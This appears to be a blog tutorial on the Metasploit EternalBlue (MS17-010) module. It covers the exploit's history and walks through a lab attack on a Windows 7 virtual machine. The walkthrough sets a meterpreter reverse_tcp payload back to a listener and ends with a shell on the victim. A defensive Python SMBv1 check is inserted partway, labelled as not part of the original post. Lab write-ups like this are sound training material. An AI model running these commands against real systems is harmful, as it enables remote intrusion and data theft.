MS17-010 EternalBlue

EternalBlue is an exploit supposedly developed by the NSA. It was leaked by the hacker group “Shadow Brokers” on April 14, 2017, and was used in the widespread WannaCry ransomware attack on May 12, 2017.

Name of the module
exploit/windows/smb/ms17_010_eternalblue

Authors
Sean Dillon <sean.dillon [at] risksense.com>
Dylan Davis <dylan.davis [at] risksense.com>
Equation Group
Shadow Brokers
thelightcosine

Module targets
Windows 7 and Server 2008 R2 (x64) All Service Packs

Architectures
x64

Module options

msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > show targets
            ...targets...
msf exploit(ms17_010_eternalblue) > set TARGET <target-id>
msf exploit(ms17_010_eternalblue) > show options
            ...show and set options...
msf exploit(ms17_010_eternalblue) > exploit

We will walk through a simple example so you can see what this module can do.

The requirements are the following:

  1. Windows 7 virtual machine
  2. Ubuntu Linux virtual machine
  3. VirtualBox
  4. Metasploit

As a first step, we make sure that both machines are connected to the same network, that is, that the Linux machine can ping the Windows 7 machine.

EternalBlue is an exploit that targets a vulnerability in Microsoft SMB v1.0. It is now commonly used by malware to spread across a network. Malicious programs that have used it include WannaCry, Trickbot, WannaMine and many others. Machines that are not patched against this vulnerability are at high risk of attack.
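Because the exposure described above depends on the host still accepting SMB v1.0, the following added example (not part of the original post or of Metasploit) checks whether a machine you administer answers an SMBv1-only negotiate request. The function names, result labels and sample replies are assumptions made for this illustration. A result of "smb1-enabled" only means SMBv1 is reachable, not that the MS17-010 patch is missing.

```python
import socket
import struct

DIALECT = b"\x02NT LM 0.12\x00"  # offer only the SMBv1 dialect

def build_negotiate():
    """NetBIOS-framed SMB1 Negotiate Protocol request (no SMB2 dialects)."""
    header = struct.pack(
        "<4sBIBHH8sHHHHH",
        b"\xffSMB", 0x72,   # SMB1 protocol id, SMB_COM_NEGOTIATE
        0, 0x18, 0xC001,    # status, flags, flags2
        0, b"\x00" * 8, 0,  # PIDHigh, signature, reserved
        0xFFFF, 0xFEFF, 0, 0,  # TID, PID, UID, MID
    )
    smb = header + b"\x00" + struct.pack("<H", len(DIALECT)) + DIALECT
    return struct.pack(">I", len(smb)) + smb  # type 0x00 + 24-bit length

def classify(resp):
    """Map a raw reply to 'smb1-enabled', 'smb1-refused' or 'unknown'."""
    if not resp:
        return "smb1-refused"  # server closed the connection on an SMB1-only offer
    smb = resp[4:]  # skip NetBIOS session header
    if len(smb) < 35 or smb[:5] != b"\xffSMB\x72":
        return "unknown"
    status = struct.unpack_from("<I", smb, 5)[0]
    word_count = smb[32]
    dialect_index = struct.unpack_from("<H", smb, 33)[0]
    if status == 0 and word_count == 17 and dialect_index != 0xFFFF:
        return "smb1-enabled"
    return "smb1-refused"

def check_host(host, port=445, timeout=3.0):
    """Probe a host you administer (e.g. the lab Windows 7 VM)."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return "port-closed"
    with sock:
        try:
            sock.sendall(build_negotiate())
            return classify(sock.recv(1024))
        except OSError:  # reset or timeout: no SMB1 reply to the offer
            return "smb1-refused"

# Constructed replies (cut off after DialectIndex), not captured traffic.
_HDR = b"\xffSMB\x72" + b"\x00" * 4 + b"\x98\x01\xc0" + b"\x00" * 20
SAMPLE_SMB1_ON = b"\x00\x00\x00\x23" + _HDR + b"\x11\x00\x00"
SAMPLE_NO_DIALECT = b"\x00\x00\x00\x23" + _HDR + b"\x01\xff\xff"

if __name__ == "__main__":
    print(classify(SAMPLE_SMB1_ON), classify(SAMPLE_NO_DIALECT), classify(b""))
```

Hosts that report "smb1-enabled" are the ones to prioritise for patching or for disabling SMB v1.0.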

Let’s start playing with this.

We open an Ubuntu terminal and type the following.

$ msfconsole -q
> use exploit/windows/smb/ms17_010_eternalblue
> set RHOST 192.168.248.3
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
> set LHOST 192.168.248.4

> exploit

 meterpreter > shell

As a final result, we have a shell on the victim machine, and we can also look for any files we want.


Resources:

https://www.rapid7.com/db/modules/payload/windows/x64/meterpreter/reverse_tcp


This post was written by Ruben Dario Caravajal Herrera